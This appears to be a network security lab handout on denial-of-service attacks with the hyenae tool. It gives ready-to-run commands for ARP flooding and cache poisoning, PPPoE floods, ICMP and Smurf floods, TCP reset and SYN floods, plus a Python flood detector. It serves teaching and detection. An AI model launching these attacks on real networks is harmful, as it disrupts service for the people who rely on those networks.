Analysis of Denial-of-Service Attack Characteristics
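This experiment includes the following analysis requirements:
(1) Use the hyenae-0.36-1_fe_0.1-1-win32 attack tool to carry out the denial-of-service experiment. The package is a collection of denial-of-service attacks. During each attack, use screenshots of the Wireshark interface to illustrate the network characteristics of the different denial-of-service attacks, then summarize methods for detecting denial-of-service attacks, set up a Snort rule that detects network scanning, and test its effect (illustrate with screenshots).
(2) The attack types are as follows: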
1 ARP-Request Flood
This example will send an unlimited amount of ARP-Request packets from a
random source to all available machines on the network.
# hyenae -I 1 -a arp-request -s % -d ff:ff:ff:ff:ff:ff \
# -S %-% -D 00:00:00:00:00:00-192.168.0.1
NOTE:
The hardware address strip of the source and the sender address pattern
will be equally randomized to avoid corrupt packets.
2 ARP-Cache Poisoning
This example will send an ARP-Reply packet from a fictional source address
to all available machines on the network.
# hyenae -I 1 -a arp-reply -s 00:f0:21:03:c6:00 -d ff:ff:ff:ff:ff:ff \
# -S 11:22:33:44:55:66-192.168.0.1 -D ff:ff:ff:ff:ff:ff-0.0.0.0 -c 1
4 Blind PPPoE Session Initiation Flood
This example sends an unlimited amount of PPPoE-Discovery packets with the
PADI flag set and an incrementing session id from a random source address to
all available machines on the network.
# hyenae -I 1 -a pppoe-discover -o padi -s % -d ff:ff:ff:ff:ff:ff
5 Blind PPPoE Session Termination
This example sends an unlimited amount of PPPoE-Discovery packets with the
PADT flag set and an incrementing session id from an existing source address
to an existing destination address.
# hyenae -I 1 -a pppoe-discover -o padt -s 11:22:33:44:55:66 \
# -d 44:55:66:77:88:99 -q 1 -Q 1
6 ICMP-Echo Flood
This example will send a random amount of ICMP-Echo packets between 1 and 10000 from a random source to a fictional target.
# hyenae -I 1 -a icmp-echo -s %-% -d 00:f0:21:03:c6:00-192.168.0.1 \
# -c 1 -C 10000
7 ICMP-Smurf Attack
This example will send an unlimited amount of ICMP-Echo packets from an existing source address against a network broadcast address.
# hyenae -I 1 -a icmp-echo -s 00:f0:21:03:c6:00-192.168.0.1 \
# -d ff:ff:ff:ff:ff:ff-255.255.255.255
8 ICMP Based TCP-Connection Reset
This example will send a single ICMP "Destination Unreachable" packet with the message code "Port unreachable", from a fictional source to a fictional target. The secondary source and destination patterns are used to set the
source and destination of the TCP packet that is attached at the end of the
ICMP packet.
# hyenae -I 1 -a icmp-unreach-tcp -o port \
# -s 00:c0:33:d4:03:06-192.168.0.2 \
# -d 00:f0:21:03:c6:00-192.168.0.1 \
# -S 00:c0:33:d4:03:06-192.168.0.2@1093 \
# -D 00:f0:21:03:c6:00-192.168.0.1@21 \
# -C 1
9 TCP-SYN Attack
This example will send an unlimited amount of TCP packets with set SYN flag, from a random source to a fictional target, with a random send delay between
1 and 1000 milliseconds.
# hyenae -I 1 -a tcp -f s -s %-%@%%%% -d 00:f0:21:03:c6:00-192.168.0.1@21 \
# -e 1 -E 1000
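The floods in sections 6, 7 and 9 differ on the wire mainly in packet rate, source diversity and destination address, which is what a detector can key on. The sketch below is an added example, not part of the original lab text or of hyenae; the record format, the thresholds and the names `detect_floods` and `sample_traffic` are assumptions, and it generalizes the SYN-flood case to ICMP echo floods and Smurf traffic.

```python
from collections import defaultdict, deque

BROADCAST = "255.255.255.255"  # only the limited broadcast address is checked

def detect_floods(packets, window=1.0, threshold=20, min_sources=10):
    """packets: dicts sorted by 'ts' with keys ts, src, dst, proto and
    'flags' (tcp) or 'type' (icmp). Thresholds are assumed values.
    Returns a set of (alert_name, victim_ip) tuples."""
    recent = defaultdict(deque)  # (kind, dst) -> (ts, src) inside the window
    alerts = set()
    for p in packets:
        if p["proto"] == "tcp" and p.get("flags") == "S":
            kind = "tcp-syn-flood"
        elif p["proto"] == "icmp" and p.get("type") == 8:  # echo request
            if p["dst"] == BROADCAST:
                # Smurf: every host answers the source, so the source is the victim.
                alerts.add(("icmp-smurf", p["src"]))
                continue
            kind = "icmp-echo-flood"
        else:
            continue
        q = recent[(kind, p["dst"])]
        q.append((p["ts"], p["src"]))
        while p["ts"] - q[0][0] > window:  # drop records older than the window
            q.popleft()
        # Flood signature: high rate to one target from many distinct sources.
        if len(q) >= threshold and len({s for _, s in q}) >= min_sources:
            alerts.add((kind, p["dst"]))
    return alerts

def sample_traffic():
    """Constructed records for illustration, not captured traffic."""
    pkts = []
    for i in range(40):  # 40 bare SYNs in 0.4 s, each from a different source
        pkts.append({"ts": i * 0.01, "src": f"10.0.{i}.{i + 1}",
                     "dst": "192.168.0.1", "proto": "tcp", "flags": "S"})
    for i in range(3):   # ordinary client: one SYN per second
        pkts.append({"ts": 1.0 + i, "src": "192.168.0.50",
                     "dst": "192.168.0.2", "proto": "tcp", "flags": "S"})
    for i in range(5):   # echo requests sent to the broadcast address
        pkts.append({"ts": 5.0 + i * 0.1, "src": "192.168.0.1",
                     "dst": BROADCAST, "proto": "icmp", "type": 8})
    pkts.append({"ts": 6.0, "src": "192.168.0.50",   # a single ordinary ping
                 "dst": "192.168.0.2", "proto": "icmp", "type": 8})
    return sorted(pkts, key=lambda p: p["ts"])

if __name__ == "__main__":
    for alert in sorted(detect_floods(sample_traffic())):
        print(alert)
```

The same per-target counters can be fed from a Wireshark export of the lab capture to check which thresholds separate the attack traffic from the baseline.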
10 TCP-Land Attack